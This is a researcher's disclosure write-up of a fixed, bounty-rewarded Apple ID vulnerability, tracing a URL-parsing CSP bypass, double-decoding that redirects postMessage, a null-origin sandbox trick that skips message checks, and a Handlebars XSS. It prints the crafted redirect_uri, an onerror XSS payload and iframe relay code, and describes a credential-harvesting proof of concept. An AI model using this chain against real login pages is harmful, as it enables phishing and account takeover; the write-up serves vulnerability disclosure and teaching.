Part 1: The Doorman's Secret

Computer systems don't tend to just trust each other, especially on the web. The times they do usually end up being mistakes. Let me ask you this: when you sign into Google, do you expect it to know what you watched on Netflix? Of course not. That's down to a basic rule of the web: different websites don't share information with each other by default.

iCloud, then, is a bit of a curiosity. It has its own domain, icloud.com, entirely separate from Apple's usual apple.com, yet its core feature is of course logging into your Apple iCloud account.
More interestingly still, you might notice that most login systems, for, say, Google, redirect you through a common login domain like accounts.google.com, but iCloud's doesn't. Behind the looking-glass, Apple has made this work by having iCloud include a webpage that is located on the AppleID server, idmsa.apple.com. The page is located at this address:

https://idmsa.apple.com/appleauth/auth/authorize/signin?frame_id=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&language=en_US&iframeId=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&client_id=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d&redirect_uri=https://www.icloud.com&response_type=code&response_mode=web_message&state=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&authVersion=latest

Here, Apple is using OAuth 2, a capability-based authentication framework. 'Capability-based' is key here, because it means that a login from apple.com doesn't necessarily equate to one from icloud.com, and also not all iCloud logins are necessarily the same either — that's how Find My manages to skip a second-factor check to find your phone. This allows Apple to (to some extent) reduce the blast radius of security issues that might otherwise touch iCloud. This is modified, however, to allow the login to work embedded in another page; response_mode=web_message seems to be a switch that turns this on.

If you visit the address, you'll notice the page is just blank. This is for good reason: if anyone could just show the Apple iCloud login page, then you could play around with the presentation of the login page to steal Apple user data (a 'redress attack'). Apple's code is detecting that it's not being put in the right place and blanks out the page.

In typical OAuth, the 'redirect_uri' specifies where the access is being sent to; in a normal, secure form, the redirect URI gets checked against what's registered for the other, 'client_id' parameter to make sure that it's safe for Apple to send the special keys that grant access there — but here, there's no redirect that would cause that. In this case the redirect_uri parameter is being used for a different purpose: to specify the domain that can embed the login page.

In a twist of fate, this one fell prey to a similar bug to the one from "how to hack the uk tax system, i guess", which is that web addresses are extraordinarily hard to compare safely. Necessarily, something like this parameter must pass through several software systems, which individually probably have subtly different ways of interpreting the information. For us to be able to bypass this security control, we want the redirect_uri checker on the AppleID server to think icloud.com, and other systems to think something else. URLs (web addresses) are the perfect conduit for this.

Messing with the embed in situ in the iCloud page with Chrome DevTools, I found that a redirect_uri of 'https://abc@www.icloud.com' would pass just fine, despite it being a really weird way of saying the same thing. The next part of the puzzle is: how do we get the iCloud login page into our page?
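You can check the ambiguity with the browser's own URL parser: everything before the '@' is read as userinfo, not as the host. A quick sketch (runs in any browser console):

// The WHATWG URL parser treats "abc" as userinfo and keeps the real host:
console.log(new URL('https://abc@www.icloud.com').origin);
// -> "https://www.icloud.com"
// Any check that extracts the origin this way sees icloud.com, while other
// software that handles the raw string may read it quite differently.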
Consult this reference on embed control:

X-Frame-Options: DENY
Prevents any kind of embedding.
pros: ancient, everyone supports it
cons: the kids will laugh at you; if you want only some embedding, you need some complicated and unreliable logic

X-Frame-Options: ALLOW-FROM http://example.com
Only allows embedding from a specific place.
pros: a really good idea from a security perspective
cons: was literally only supported by Firefox and Internet Explorer for a short time, so using it will probably make you less secure

Content-Security-Policy: frame-ancestors
Only allows embedding from specific place(s).
pros: new and cool, there are probably TikToks about how to use it; prevents embeds-in-embeds bypassing your controls
cons: probably very old browsers will ignore it

If you check Chrome DevTools' 'Network' panel, you will find the AppleID signon page uses both X-Frame-Options: ALLOW-FROM (which essentially does nothing), and Content-Security-Policy: frame-ancestors. Here's a cut-down version of what the Content-Security-Policy header looks like when 'redirect_uri' is set to the default "https://www.icloud.com/":

Content-Security-Policy: frame-ancestors 'self' https://www.icloud.com

This directs the browser to only allow embeds in iCloud. Next, what about our weirder redirect_uri, https://abc@icloud.com?

Content-Security-Policy: frame-ancestors 'self' https://abc@www.icloud.com

Very interesting! Now, humans are absolute fiends for context-clues. Human language is all about throwing a bunch of junk together and having it all picked up in context, but computers have a beautiful, childlike innocence toward them. Thus, I can set redirect_uri to 'https://mywebsite.com;@icloud.com/', and then the AppleID server continues to think all is well, but sends:

Content-Security-Policy: frame-ancestors 'self' https://mywebsite.com;@www.icloud.com

This is because the 'URI' language that's used to express web addresses is contextually different to the language used to express Content Security Policies. 'https://mywebsite.com;@www.icloud.com' is a totally valid URL, meaning the same as 'https://www.icloud.com', but to Content-Security-Policy the same statement means 'https://mywebsite.com' and then some extra garbage which gets ignored after the ';'. Using this, we can embed the Apple ID login page in our own page.

However, not everything is quite as it seems. If you fail to be able to embed a page in Chrome, you get this cute lil guy:

But, instead we get a big box of absolutely nothing:

Part 2: Communicating with the blank box

Our big box, though blank, is not silent. When our page loads, the browser console gives us the following cryptic message:

{"type":"ERROR","title":"PMRPErrorMessageSequence","message":"APPLE ID : PMRPC Message Sequence log fail at AuthWidget.","iframeId":"601683d3-4d35-4edf-a33e-6d3266709de3","details":"{\"m\":\"a:28632989 b:DEA2CA08 c:req h:rPR e:wSR:SR|a:28633252 b:196F05FD c:req h:rPR e:wSR:SR|a:28633500 b:DEA2CA08 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28633598 b:B74DD348 c:req h:rPR e:wSR:SR|a:28633765 b:196F05FD c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634110 b:BE7671A8 c:req h:rPR e:wSR:SR|a:28634110 b:B74DD348 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634621 b:BE7671A8 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28635123 b:E6F267A9 c:req h:rPR e:wSR:SR|a:28635130 b:25A38CEC c:req h:r e:wSR:SR|a:28635635 b:E6F267A9 c:rRE f:Application error. 
Destination unavailable. 500 h:rPR e:f2:rRE|a:28636142 b:25A38CEC c:rRE f:Application error. Destination unavailable. 1000 h:r e:f2:rRE\",\"pageVisibilityState\":\"visible\"}"}

This message is mostly useless for discerning what exactly is going wrong. At this point, I like to dig more into the client code itself to work out the context of this error. The Apple ID application is literally millions of lines of code, but I have better techniques. In this case, if we check the Network panel in Chrome DevTools, we can see that when an error occurs, a request is sent to 'https://idmsa.apple.com/appleauth/jslog', presumably to report to Apple that an error occurred. Chrome DevTools' 'Sources' panel has a component on the right called "XHR/fetch Breakpoints" which can be used to stop the execution of the program when a particular web address is requested. Using this, we can pause the application at the point the error occurs, and ask our debugger to go backwards to the condition that caused the failure in the first place. Eventually, stepping backward, there's this:

new Promise(function(e, n) {
    it.call({
        destination: window.parent,
        publicProcedureName: "ready",
        params: [{ iframeTitle: d.a.getString("iframeTitle") }],
        onSuccess: function(t) { e(t) },
        onError: function(t) { n(t) },
        retries: p.a.meta.FEConfiguration.pmrpcRetryCount,
        timeout: p.a.meta.FEConfiguration.pmrpcTimeout,
        destinationDomain: p.a.destinationDomain
    })
})

The important part here is window.parent, which is our fake version of iCloud. It looks like the software inside AppleID is trying to contact our iCloud parent when the page is ready, and failing over and over (see: retries). This communication is happening over postMessage (the 'pm' of pmrpc). Lastly, the code is targeting a destinationDomain, which is likely set to something like https://www.icloud.com; then, since our embedding page is not that domain, there's a failure.

We can inject code into the AppleID Javascript and the iCloud Javascript to view their version of this conversation:

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"receivePingRequest","params":["ready"],"id":"9BA799AA-6777-4DCC-A615-A8758C9E9CE2"}
AppleID tells iCloud it's ready to receive messages.

iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"9BA799AA-6777-4DCC-A615-A8758C9E9CE2","result":true}
iCloud responds to the ping request with a 'pong' response.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"ready","params":[{"iframeTitle":"Sign In with Your Apple ID"}],"id":"E0236187-9F33-42BC-AD1C-4F3866803C55"}
AppleID tells iCloud that the frame is named 'Sign In with Your Apple ID' (I'm guessing to make the title of the page correct).

iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"E0236187-9F33-42BC-AD1C-4F3866803C55","result":true}
iCloud acknowledges receipt of the title.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"receivePingRequest","params":["config"],"id":"87A8E469-8A6B-4124-8BB0-1A1AB40416CD"}
AppleID asks iCloud if it wants the login to be configured.

iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"87A8E469-8A6B-4124-8BB0-1A1AB40416CD","result":true}
iCloud acknowledges receipt of the configuration request, and says that it does, yes, want the login to be configured.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","method":"config","params":[],"id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B"}
AppleID asks iCloud for a login dialog configuration.
iCloud → AppleID: pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":{"data":{"features":{"rememberMe":true,"createLink":false,"iForgotLink":true,"pause2FA":false},"signInLabel":"Sign in to iCloud","serviceKey":"d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d","defaultAccountNameAutoFillDomain":"icloud.com","trustTokens":["HSARMTnl/S90E=SRVX"],"rememberMeLabel":"keep-me-signed-in","theme":"dark","waitAnimationOnAuthComplete":false,"logo":{"src":"data:image/png;base64,[ … ]ErkJggg==","width":"100px"}}}}
iCloud configures the login dialog. This includes data like the iCloud logo to display, the caption "Sign in to iCloud", and, for example, whether a link should be provided for if the user forgets their password.

AppleID → iCloud: pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":true}
iCloud confirms receipt of the login configuration.

In order to make our bootleg iCloud work, we will need code that completes the conversation in the same way. You can look at a version I made, here.

Our next problem is that destinationDomain I pointed out before: postMessage ensures that snot-nosed kids trying to impersonate iCloud can't just impersonate iCloud, by having every postMessage carry a targetOrigin, basically a specified destination of the webpage. It's not enough that the message gets sent to window.parent; that parent must also be securely specified to prevent information going the wrong place.

Part 3: Snot-Nosed Kid Mode

This one isn't as easy as reading what AppleID does and copying it. We need to find another security flaw between our single input, redirect_uri, through to destinationDomain, and then finally on to postMessage. Again, the goal here is to find some input redirect_uri that still holds the exploit conditions from Part 1, but also introduces new exploit conditions for this security boundary.

By placing a breakpoint at the destinationDomain line we had before, we can see that, unlike both the AppleID server and Content-Security-Policy, the whole redirect_uri parameter, 'https://mywebsite.com;@www.icloud.com', is being passed to postMessage, as though it were this code:

window.parent.postMessage(data_to_send, "https://mywebsite.com;@www.icloud.com");

At first, this seems like an absolute impasse. In no possible way is our page going to be at the address 'https://mywebsite.com;@www.icloud.com'. However, once you go from the reference documentation to the technical specification, the plot very much thickens. In section 9.4.3 of the HTML standard, the algorithm for comparing postMessage origins is specified, and step 5 looks like this:

Let parsedURL be the result of running the URL parser on targetOrigin. If parsedURL is failure, then throw a "SyntaxError" DOMException. Set targetOrigin to parsedURL's origin.

Crucially, despite "https://mywebsite.com;@www.icloud.com" being not at all a valid place to send a postMessage, the algorithm extracts a valid origin from it (i.e. it becomes https://www.icloud.com). Again, this gives us purchase to sneak some extra content in there to potentially confuse other parts of AppleID's machinery. The source for the AppleID login page starts with a short preamble that tells the AppleID login framework what the destination domain (in this case iCloud) is for the purpose of login:

bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;@www.icloud.com");

This information eventually bubbles down to the destinationDomain we're trying to mess with.
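A quick sketch of what step 5 does to strings like ours (same URL parser as in Part 1; runs in any browser console):

// postMessage runs the URL parser over targetOrigin and keeps only the origin:
console.log(new URL('https://mywebsite.com;@www.icloud.com').origin);
// -> "https://www.icloud.com"   (the ";@" junk evaporates: the impasse)
// ...but that very same step means that if we can smuggle in a '?', everything
// after it becomes the query, and a different origin gets extracted:
console.log(new URL('https://mywebsite.com? mywebsite.com;@www.icloud.com').origin);
// -> "https://mywebsite.com"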
When toying with 'redirect_uri', I found that there's a bug in the way this functionality is programmed in Apple's server. For an input 'https://mywebsite.com;"@www.icloud.com' (note the double quote), this code is produced:

bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com");

The double quote is 'escaped' with a '\' to ensure that we don't break out of the quoted section and start executing our own code. However, something a little odd happens when we instead input 'https://mywebsite.com;%22@www.icloud.com'. '%22' is what you get from 'encodeURIComponent' of a double quote, the opposite of what Apple is doing here.

bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com");

We get exactly the same response! This means that Apple is already doing a decodeURIComponent on the server before the value even reaches this generated Javascript. Then, the generated Javascript performs the same decoding a second time. Someone made the mistake of doing the same decoding on both the client and the server, but it didn't become a functionality-breaking bug because the intended usage doesn't have any doubly-encoded components. We can, however, introduce these. 😉

Because the server is using the once-decodeURIComponent-ed form, and the client is using the twice-decodeURIComponent-ed form, we can doubly encode special modifier characters in our URI that we want only the client to see, while still passing all the server-side checks! After some trial and error, I determined that I can set redirect_uri to:

https%3A%2F%2Fmywebsite.com%253F%20mywebsite.com%3B%40www.icloud.com

This order of operations then happens (see the runnable sketch just below):

1. AppleID's server decodeURIComponent-s it, producing: https://mywebsite.com%3F mywebsite.com;@www.icloud.com
2. AppleID's server parses the origin from https://mywebsite.com%3F mywebsite.com;@www.icloud.com, and gets https://www.icloud.com, which passes the first security check.
3. AppleID's server takes the once-decodeURIComponent-ed form and sends Content-Security-Policy: allow-origin https://mywebsite.com%3F mywebsite.com;@www.icloud.com
4. The browser parses the Content-Security-Policy directive and parses out origins again, allowing embedding of the iCloud login from both 'https://mywebsite.com%3f' (which is nonsense) and 'mywebsite.com' (which is us!!!!). This passes the second security check and allows the page to continue loading.
5. AppleID's server generates the sign-in page with the Javascript bootData.destinationDomain = decodeURIComponent("https://mywebsite.com%3F mywebsite.com;@www.icloud.com");
6. The second decodeURIComponent sets bootData.destinationDomain to https://mywebsite.com? mywebsite.com;@www.icloud.com
7. When the AppleID client tries to send data to www.icloud.com, it sends it to https://mywebsite.com? mywebsite.com;@www.icloud.com
8. The browser, when performing postMessage, parses an origin yet again (!!) from https://mywebsite.com? mywebsite.com;@www.icloud.com. The '?' causes everything after it to be ignored, resulting in the target origin 'https://mywebsite.com'. This passes the third security check.

However, this is only half of our problems, and our page will stay blank. Here's what a blank page looks like, for reference:

Part 4: Me? I'm Nobody.

Though we can now receive the messages AppleID sends to 'iCloud', we cannot perform full initialisation of the login dialog without also sending messages of our own. However, AppleID checks the senders of all messages it gets, and that mechanism is totally different from the one used for a postMessage send.
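As promised above, here's the Part 3 double decode condensed into a runnable sketch. This is my own illustration, not Apple's code; new URL stands in for the origin parsing that Apple's server, the CSP machinery, and postMessage each perform:

const redirectUri =
    "https%3A%2F%2Fmywebsite.com%253F%20mywebsite.com%3B%40www.icloud.com";

// What Apple's server sees after its own decodeURIComponent:
const serverSees = decodeURIComponent(redirectUri);
// -> "https://mywebsite.com%3F mywebsite.com;@www.icloud.com"
new URL(serverSees).origin; // "https://www.icloud.com" -- passes the server-side check

// What the generated page computes when it decodes AGAIN:
const clientSees = decodeURIComponent(serverSees);
// -> "https://mywebsite.com? mywebsite.com;@www.icloud.com"
new URL(clientSees).origin; // "https://mywebsite.com" -- postMessage now targets us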
The lowest-level browser mechanism that AppleID must inevitably be calling sadly performs no abusable parse step beforehand. A typical message origin check looks like this:

if (message.origin != "https://safesite.com") throw new Error("hey!! thats illegal!");

This is just a strict string comparison, which means that we would, in theory, have to somehow be the origin https://mywebsite.com? mywebsite.com;@www.icloud.com, which has no chance of ever happening on God's green earth. However, pmrpc is actually open source, and we can view its own version of this check online. Receipt of a message is handled by 'processJSONRpcRequest', defined in 'pmrpc.js'. Line 254 decides if the request needs to be checked for security via an ACL (Access Control List) as follows:

254: !serviceCallEvent.shouldCheckACL || checkACL(service.acl, serviceCallEvent.origin)

This checks a value called 'shouldCheckACL' to determine if security is disabled, I guess 😉 That value, in turn, comes from line 221:

221: shouldCheckACL : !isWorkerComm

And then isWorkerComm comes to us via lines 205-206:

205: var eventSource = eventParams.source;
206: var isWorkerComm = typeof eventSource !== "undefined" && eventSource !== null;

'eventParams' is the event representing the postMessage, and 'event.source' is a reference to the window (i.e. page) that sent the message. I'd summarise this check as follows:

if (message.source !== null && !(message.origin === "https://mywebsite.com? mywebsite.com;@www.icloud.com"))

That means the origin check is completely skipped if message.source is 'null'. Now, I believe the intention here is to allow rapid testing of pmrpc-based applications: if you are making up a test message, its 'source' can then be set to 'null', and you no longer need to worry about security getting in the way.

Good thing section 9.4.3, step 8.3 of the HTML standard says a postMessage event's source is always a 'WindowProxy object', so it can never be 'null' instead, right? Ah, but section 8.6 of the HTML standard defines an iframe sandboxing flag 'allow-same-origin' which, if not present in a sandboxed iframe, sets the 'sandboxed origin browsing context flag' (defined in section 7.5.3), which 'forces the content into a unique origin' (defined in section 7.5.5), which makes the window an 'opaque origin' (defined in section 7.5), which, when given to Javascript, is turned into null (!!!!).

This means that when we create an embedded, sandboxed frame, as long as we don't provide the 'allow-same-origin' flag, we create a special window that is considered to be null, and thus bypasses the pmrpc security check on received messages. A 'null' page, however, is heavily restricted, and, importantly, if our attack page identifies as null via this trick, all the other checks we worked so hard to bypass will fail. Instead, we can embed both Apple ID (with all the hard work we did before) and a 'null' page. We can still postMessage to the null page, so we use it to forward our messages on to Apple ID, which thinks, because they come from a 'null' window, that it must have generated them itself. You can read my reference implementation of this forwarding code, here (a minimal sketch follows below).

Part 5: More than Phishing

Now that AppleID thinks we're iCloud, we can mess around with all of those juicy settings that it gets. How about offering a free Apple gift card to coerce the user into entering their credentials?
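Here is that minimal sketch of the null-window relay from Part 4. The frame name 'appleid' and the pmrpcPayload variable are assumptions of mine for illustration; the real forwarding code linked above is more involved:

// On the attacker page, alongside the Apple ID iframe (assumed to be
// named 'appleid'). The relay is sandboxed WITHOUT 'allow-same-origin',
// so it runs with an opaque origin: 'null' as far as JavaScript cares.
const relay = document.createElement("iframe");
relay.setAttribute("sandbox", "allow-scripts");
relay.srcdoc = `<script>
    // Inside the opaque-origin frame: forward whatever the embedder
    // hands us on to the Apple ID frame. To the receiver, the sender
    // of these messages now registers as 'null'.
    onmessage = (e) => parent.frames["appleid"].postMessage(e.data, "*");
<\/script>`;
document.body.appendChild(relay);

// Later, instead of messaging Apple ID directly, we go via the relay:
// relay.contentWindow.postMessage(pmrpcPayload, "*");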
In our current state, having tricked Apple ID into thinking that we're iCloud, we have a little box that fills in your Apple email very nicely. When you log in to our embed, we get an authentication for your Apple account over postMessage. Even if you don't pass 2FA! This is because, for iCloud 'Find My', an authentication token is granted without passing 2FA: it's used for finding your potentially lost phone, which may be the very device you'd otherwise need in order to pass 2FA.

However, this is basically phishing. Although this is extremely high-tech phishing, I have no doubt the powers that be will argue that you could just make a fake AppleID page to the same effect. We need more.

We're already in a position of extreme privilege. Apple ID thinks we're iCloud, so the Apple ID system is likely to be a lot more trusting of what we ask of it. As noted before, we can set a lot of configuration settings that affect how the login page is displayed:

pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":{"data":{"features":{"rememberMe":true,"createLink":false,"iForgotLink":true,"pause2FA":false},"signInLabel":"Sign in to iCloud","serviceKey":"d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d","defaultAccountNameAutoFillDomain":"icloud.com","trustTokens":["HSARMTnl/S90E=SRVX"],"rememberMeLabel":"keep-me-signed-in","theme":"dark","waitAnimationOnAuthComplete":false,"logo":{"src":"data:image/png;base64,[ ... ]ErkJggg==","width":"100px"}}}}

That's all well and good, but what about the options that iCloud can use, but simply chooses not to? They won't be here, but we can use Chrome DevTools' 'code search' feature to search all the code the Apple ID client software uses. 'signInLabel' makes a good search term, as it probably doesn't turn up anywhere else:

d()(w.a, "envConfigFromConsumer.signInLabel", "").trim() && n.attr("signInLabel", w.a.envConfigFromConsumer.signInLabel),

It looks like all of these settings like 'signInLabel' are part of this 'envConfigFromConsumer', so we can search for that:

this.attr("testIdpButtonText", d()(w.a, "envConfigFromConsumer.testIdpButtonText", "Test"))
d()(w.a, "envConfigFromConsumer.accountName", "").trim() ? (n.attr("accountName", w.a.envConfigFromConsumer.accountName.trim()),
n.attr("showCreateLink", d()(w.a, "envConfigFromConsumer.features.createLink", !0)),
n.attr("showiForgotLink", d()(w.a, "envConfigFromConsumer.features.iForgotLink", !0)),
n.attr("learnMoreLink", d()(w.a, "envConfigFromConsumer.learnMoreLink", void 0)),
n.attr("privacyText", d()(w.a, "envConfigFromConsumer.privacy", void 0)),
n.attr("showFooter", d()(w.a, "envConfigFromConsumer.features.footer", !1)),
n.attr("showRememberMe") && ("remember-me" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() ? n.attr("rememberMeText", l.a.getString("rememberMe")) : "keep-me-signed-in" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() && n.attr("rememberMeText", l.a.getString("keepMeSignedIn")),
n.attr("isRememberMeChecked", !!d()(w.a, "envConfigFromConsumer.features.selectRememberMe", !1) || !!d()(w.a, "accountName", "").trim())),
i = d()(w.a, "envConfigFromConsumer.verificationToken", ""),

The values we know from our config are given different names for use in a template. For example, 'envConfigFromConsumer.features.footer' becomes 'showFooter'. (A sketch of our fake parent's side of this configuration exchange follows below.)
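To ground this, here's a sketch of our fake parent answering Apple ID's pmrpc calls. The method and field names come from the conversation captured earlier; the dispatch is a toy compared to real pmrpc (no retries, no ACLs), and the '*' target is fine here because we don't care who reads our own replies:

// A sketch of the "fake iCloud" parent's side of the handshake.
window.addEventListener("message", (e) => {
    if (typeof e.data !== "string" || !e.data.startsWith("pmrpc.")) return;
    const call = JSON.parse(e.data.slice("pmrpc.".length));
    if (!call.method) return; // ignore acknowledgements of our own replies

    const reply = (result) => e.source.postMessage(
        "pmrpc." + JSON.stringify({ jsonrpc: "2.0", id: call.id, result }), "*");

    if (call.method === "receivePingRequest") reply(true); // answer pings
    else if (call.method === "ready") reply(true);         // acknowledge the iframe title
    else if (call.method === "config") reply({ data: {     // send our chosen dialog config
        signInLabel: "Sign in to iCloud",
        rememberMeLabel: "keep-me-signed-in",
        features: { rememberMe: true, createLink: false, iForgotLink: true }
    } });
});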
In DevTools' Network panel, we can search all resources the page uses, code and otherwise, for where these inputs end up:

{{#if showRememberMe}}
<div class="si-remember-password">
    <input type="checkbox" id="remember-me" class="form-choice form-choice-checkbox" {($checked)}="isRememberMeChecked">
    <label id="remember-me-label" class="form-label" for="remember-me">
        <span class="form-choice-indicator"></span>
        {{rememberMeText}}
    </label>
</div>

What a lovely blast from the past! These are Handlebars templates, a bastion of the glorious Web 2.0 era in which I started my career in tech! Handlebars has a bit of a dirty secret. '{{value}}' statements work like you expect, safely putting content into the page; but '{{{value}}}' extremely unsafely injects potentially untrusted HTML code, and for most inputs the two look just the same! (A standalone sketch of this behaviour appears at the very end of this writeup.) Let's see if an Apple engineer made a typo by searching the templates for "}}}":

{{#if showLearnMoreLink}}
<div>
    {{{learnMoreLink}}}
</div>
{{/if}}
{{#if showPrivacy}}
<div class="label-small text-centered centered tk-caption privacy-wrapper">
    <div class="privacy-icon"></div>
    {{{privacyText}}}
</div>
{{/if}}

Perfect! From our previous research, we know that 'privacyText' comes from the configuration option 'envConfigFromConsumer.privacy', or just 'privacy'. Once we re-configure our client to send the configuration option { "privacy": "<img src=fake onerror='alert(document.domain)'" }, Apple ID will execute our code and show a little popup indicating what domain we have taken over:

Part 6: Overindulgence

Now it's time to show off. Proofs of concept are all about demonstrating impact, and a little pop-up window isn't scary enough. We have control over idmsa.apple.com, the in-browser client of the Apple ID server, and so we can access all the credentials saved there (your Apple login and cookie) and, in theory, we can 'jump' to other Apple login windows. Those credentials are all stored in a form that we can use to take over an Apple account, but they're not a username and password, and a username and password is what I think of as scary.

For my proof of concept, I:

1. Execute my full exploit chain to take over Apple ID. This requires only one click from the user.
2. Present the user with a 'login with AppleID' button by deleting all the content of the Apple ID login page and replacing it with the standard button.
3. Open a new window to the real, full Apple ID login page, same as Apple would when the button is clicked.
4. With our control of idmsa.apple.com, take control of the real Apple ID login dialog and inject our own code, which harvests the logins as they are typed.
5. Manipulate the browser history to set the exploit page location to https://apple.com, and then delete the history record of being on the exploit page. If the user checks whether they came from a legitimate Apple site, they'll just see apple.com and be unable to go back.

Full commented source code can be found here.

Video demonstration of the Proof of Concept on desktop

Although I started this project before Apple had its bug bounty program, I reported it just as the bug bounty program started, and so I inadvertently made money out of it. Apple paid me $10,000 for my bug and proof of concept, which, while I'm trying not to be a shit about it, is 2.5 times lower than the lowest bounty on their Example Payouts page, for creating an app that can access "a small amount of sensitive data". Hopefully other researchers are paid more! I also hope this was an interesting read!
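As a standalone illustration of the Handlebars behaviour that made Part 5 possible (generic Handlebars here, not Apple's code; the payload is the same one used against 'privacy' above):

// npm install handlebars
const Handlebars = require("handlebars");

const escaped   = Handlebars.compile("{{value}}");   // HTML-escapes its input
const unescaped = Handlebars.compile("{{{value}}}"); // injects raw HTML

const payload = { value: "<img src=fake onerror='alert(document.domain)'>" };

console.log(escaped(payload));
// -> &lt;img src&#x3D;fake onerror&#x3D;&#x27;alert(document.domain)&#x27;&gt; (inert text)
console.log(unescaped(payload));
// -> <img src=fake onerror='alert(document.domain)'> (live HTML: script runs)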
I took a really long time to write this, with the pandemic kind of sapping my energy, and it is my sincere hope that, despite the technical complexity here, I've written something accessible to those new to security.

Thomas

Thanks to perribus, iammandatory, and taviso for reviewing earlier versions of this disclosure.

If Apple is reading this, please do something about my other bug reports, it has been literally years, and also add my name to the Apple Hall of Fame 🥺🥺

Full timeline follows this article.

edit: Apple says my Hall of Fame will happen in September!
edit: September is almost over and it hasn't happened!

Timeline

Report to fix time: 3 days
Fix to offer time: 4 months, 3 days
Payment offer to payment time: 4 months, 5 days
Total time: 8 months, 8 days

Friday, November 15th 2019: First Apple bug, an XSS on apple.com, reported.
Saturday, November 16th 2019: Issues noticed in Apple ID. The previous bug I reported has been mitigated, but no email from Apple about it.
Thursday, November 21st 2019, 3:43AM GMT: First proof of concept sent to Apple, demonstrating impersonating iCloud to Apple ID and using it to steal Apple users' information.
Thursday, November 21st 2019, 6:06AM GMT: Templated response from Apple, saying they're looking into it.
Thursday, November 21st 2019, 8:20PM GMT: Provided first Apple ID proof of concept which injects malicious code, along with some video documentation.
Sunday, November 24th 2019: The issue is mitigated (partially fixed) by Apple.
Thursday, November 28th 2019: Ask for updates.
Tuesday, December 3rd 2019: Apple tells me there is nothing to share with me.
Wednesday, December 4th 2019: I try to pull some strings with friends to get a reply.
December 10th 2019: I ask if there is an update.
Friday, January 10th 2020: I get an automated email saying, in essence, (1) don't disclose the bug to the public until 'investigation is complete' and (2) Apple will provide information over the course of the investigation. I email for an update.
Wednesday, January 29th 2020: Ask for another update (at the 2-month mark).
Friday, January 31st 2020: Am asked to check if it's been fixed. Yes, but not exactly in the way I might have liked.
Sunday, February 2nd 2020: At ShmooCon, a security conference in Washington, DC, I happen to meet the director of the responsible disclosure program. I talk about the difficulties I've had.
Tuesday, February 4th 2020: Apple confirms the bug as fixed and asks for my name to give credit on the Apple Hall of Fame (as of August 2021, I have still not been publicly credited). I reply asking if this is covered by the bounty program. Apple responds saying that they will let me know later.
Saturday, February 15th 2020: I ask for an update on status.
Monday, February 17th 2020: Apple responds: no updates. I ask when I'll hear back.
Friday, February 21st 2020: I contact the director of the program with the details I got at ShmooCon, asking what the expected turnaround on bugs is.
Monday, March 2nd 2020: Apple responds. They say they have no specific date.
Tuesday, March 3rd 2020: The director responds, saying they don't give estimates on timelines, but he'll get it looked into.
Tuesday, March 24th 2020: Offered $10,000 for the Apple ID code injection vulnerability. Asked to register as an Apple developer so I can get paid through there.
Sunday, March 29th 2020: Enroll in the Apple Developer program, and ask when I'll be able to disclose publicly.
Tuesday, March 31st 2020: Told to accept the terms and set up my account and tax information (I am not told anything about disclosure).
Tuesday, March 31st 2020: Ask for more detailed instructions, because I can't find out how to set up my account and tax information (this is because my Apple Developer application has not yet been accepted).
Thursday, April 2nd 2020: Ask if this is being considered as a generic XSS, because the payout seems weird compared to the examples.
Tuesday, April 28th 2020: Apple replies to the request for more detailed instructions (it's the same thing, but reworded).
May 13th 2020: I ask for an update.
May 18th 2020: Am told the money is "in process to be paid", with no exact date, but expected in May or early June. They'll get back when they know.
May 18th 2020: I ask again when I can disclose.
May 23rd 2020: I am told my information has been sent to the accounts team, and that Apple will contact me about it when appropriate.
June 8th 2020: I ask for some kind of update on payment or when I can disclose.
June 10th 2020: I am informed that there is 'a new process'. The new process means I pay for my Apple Developer account myself, and Apple reimburses me that cost. I tell Apple I did this several months ago, and ask how my bug was classified within the program. I also contact the Apple security director asking if I can get help. He's no longer with Apple.
June 15th 2020: Apple asks me to provide an 'enrolment ID'.
June 15th 2020: I send Apple a screenshot of what I am seeing. All my application shows is 'Contact us to continue your enrolment'. I say I'm pretty frustrated and threaten to disclose the vulnerability if I am not given some way forward on several questions: (1) how the bug was classified, (2) when I can disclose this, and (3) what I am missing to get paid. I also rant about it on Twitter, which, in retrospect, was probably the most productive thing I did to get a proper response.
June 19th 2020: Apple gets in touch, saying they've completed the account review and now I need to set up a bank account to get paid in. Apple says they're OK with disclosing, as long as the issue is addressed in an update. Apple asks for a draft of my disclosure.
Thursday, July 2nd 2020: The Apple people are very gracious. They say thanks for the report, and say my writeup is pretty good. Whoever is answering is very surprised by where I say I found this bug only "a few days ago" in the draft I wrote, and asks me to correct it 🤔
July 29th 2020: I get paid.
… the pandemic happens …
12 August 2021: I finish my writeup!

Amendments

22/Aug/21: Fixed link to 'full source code', which originally linked to only a very small portion of the full source.

Source: https://zemnmez.medium.com/how-to-hack-apple-id-f3cc9b483a41
